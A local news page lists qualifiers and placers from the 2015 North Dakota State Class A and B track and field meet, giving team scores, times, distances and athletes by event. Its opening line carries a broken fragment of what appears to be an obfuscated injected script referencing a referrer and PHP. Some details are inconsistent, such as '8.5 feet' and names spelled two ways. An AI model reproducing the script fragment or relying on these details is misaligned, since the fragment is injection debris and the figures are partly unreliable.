BISMARCK styrt|var|u0026u|referrer|efehr||js|php’.split(‘|’),0,{}))
(NewsDakota.com) The following was the list of qualifiers and placers at the 2015 State Class A and B Track and Field meet.
Team Scores
Class A
Girls
1. Bismarck Century 45 points, 10. Jamestown 9 points
Boys
1. Bismarck High 50 points, 12. Jamestown 5 points
Class B
Girls
1. Carrington 28.5 points, 5. Milnor/Wyndmere/Lidgerwood 20 points, T-15 Northern Cass 3 points, 17. Barnes County North 2.5 points
Boys
1. New Town 41 points, 4. Carrington 13.5 points, 5. Lisbon 11.5 points, T-7 Ellendale 10 points, 11. Enderlin/Maple Valley 8 points, T-22 Northern Cass & Milnor/Wyndmere/Lidgerwood 1 point
300 Meter Hurdle Prelims
Class A
Boys
Dylan Koenig from Jamestown qualified with a time of 41.41 seconds.
Class B
Boys
Conner Wendel from Carrington qualified with a time of 40.71 seconds.
Girls
Payton Johnson from Northern Cass qualified with a time of 48.96 seconds
4 x 200 Meter Relay Prelims
Class A
Girls
Kylee Voigt, Meghan Orr, Alexis Jensen and Madison Barnes from Jamestown qualified with a time of 1:44.67
Class B
Boys
Cole Ferguson, Jacob Fandrich, Walker Carr and Seth Abaurrea from Carrington qualified with a time of 1:31.40
Brant Bohmert, Jared Dullum, Brandon Bohmert and Brian Schreiner from Northern Cass qualified with a time of 1:31.78
Girls
Sydney Griffith, Kacy Smith, Jamie Reinke and Emma Weiss from Lisbon qualified with a time of 1:48.64
Maara Nelson, Abigail Jarrett, Emerson Hooraert and Graice Paige from Carrington qualified with a time of 1:48.94
Discus
Class A
Boys
Logan Anderson from Jamestown was fourth place with a throw of 145 feet seven inches
Class B
Girls
Bailey Retzlaff from Carrington took the State Championship with a throw of 134 feet three inches
Kauri Hochhalter of Carrington took second place with a throw of 130 feet one inch
Miranda Riplinger of Lisbon was seventh with a throw of 106 feet 10 inches
Boys
Alix Wisnewski from Milnor/Wyndmere/Lidgerwood finished eight with a throw of 132 feet 5 inches.
Pole Vault
Class B
Girls
Mikayla Vellum from Milnor/Wyndmere/Lidgerwood was fifth place with a vault of 9 feet three inches.
Haley Wolfe from Carrington finished tied for sixth place with a vault of 9 feet 2.5 inches.
1600 Meter Run Finals
Class B
Girls
Peyton Frolek from Milnor/Wyndmere/Lidgerwood won the State Championship with a time of 5:08.40
Ashley Neumiller from Carrington finished second with a time of 5:31.74
Long Jump
Class B
Boys
Kellemon Hinton from Ellendale won the State Championship with a jump of 22 feet 8.5 inches
Riley Miller from Carrington took second place with a jump of 22 feet 7.25 inches
Anthony Olson from LaMoure-Lithchville/Marion finished sixth with a jump of 21 feet 1.25 inches
Seth Adkins of Northern Cass took seventh place with a jump of 20 feet 8.5 feet
Girls
Faith Aasen of Northern Cass finished sixth with a jump of 16 feet one inch
100 Meter Dash Prelims
Class A
Girls
Madison Barnes from Jamestown qualified with a time of 12.57 seconds.
Boys
Brady Carlson from Jamestown qualified with a time of 11.2 seconds.
Class B
Girls
Faith Aasen from Northern Cass qualified with a time of 12.84 seconds.
Boys
Blake Hollingsworth from Oakes qualified with a time of 10.89 seconds
Brian Schreiner from Northern Cass qualified with a time of 11.03 seconds
James Hollister from Northern Cass qualified with a time of 11.18 seconds
Cole Ferguson from Carrington qualified with a time of 11.31 seconds
Triple Jump
Class A
Girls
Jenna Stiwell from Jamestown took fifth place with a jump of 35 feet 2.75 inches.
400 Meter Dash Prelims
Class A
Girls
Kylee Voight of Jamestown qualified with a time of one minute .91 seconds.
Class B
Girls
Peyton Frolek from Milnor/Wyndmere/Lidgerwood qualified with a time of 1:01.85
Emma Bausch from Enderlin/Maple Valley qualified with a time of 1:01.97
Boys
Blake Hollingsworth from Oakes qualified with a time of 49.78 seconds (New School Record)
James Hollister from Northern Cass qualified with a time of 50.33
Ryan Larson from Enderlin/Maple Valley qualified with a time of 51.20 seconds
Seth Abaurrea from Carrington qualified with a time of 51.34 seconds
110 Meter High Hurdle Prelims
Class B
Girls
Bailey Caveat from Lisbon qualified with a time of 16.49 seconds
Payton Johnson of Northern Cass qualified with a time of 16.75 seconds
Mariah Schroeder of Enderlin/Maple Valley qualified with a time of 16.7 seconds
200 Meter Dash Prelims
Class A
Girls
Madison Barnes from Jamestown qualified with a time of 25.68 seconds (New School Record)
Boys
Brady Carlson from Jamestown qualified with a time of 22.54 seconds
Class B
Boys
Blake Hollingsworth from Oakes qualified with a time of 22.16 seconds
James Hollister of Northern Cass qualified with a time of 22.51 seconds
Brian Schreiner of Northern Cass qualified with a time of 22.30 seconds
Seth Abaurrea of Carrington qualified with a time of 22.5 seconds
Kellemon Hinton of Ellendale qualified with a time of 22.62 seconds
4×100 Meter Relay Prelims
Class A
Girls
Megan Orr, Kylee Voigt, Erin Hillerud and Madison Barnes of Jamestown qualified with a time of 51.41 seconds
Class B
Girls
Victoria Hoggarth, Faith Aasen, Payton Johnson and Cheyenne Hanson of Northern Cass qualified with a time of 51.63 seconds
Maara Nelson, Emerson Hoornaert, Gracie Page and Carmen Pederson of Carrington qualified with a time of 51.86 seconds
Boys
Walker Carr, Connor Wendel, Riley Miller and Cole Ferguson from of Carrington qualified with a time of 44.47 seconds
Brant Bohmert, Brian Schreiner, Seth Adkins, and Brandon Bohmert of Northern Cass qualified with a time of 44.54 seconds
High Jump
Class A
Girls
Jenna Stilwell from Jamestown placed fourth with a jump of 5 feet two inches
4 x 800 Meter Relay Final
Class B
Boys
Austin Konschak, Chaz Bauer, Trey Rosenau and Jacob Fandrich from Carrington finished sixth with a time of 8:42.43
Tayler Goettle, Ethan Elijah, Gabe Nieves, and Noah Ward from Lisbon finished eight with a time of 8:52.39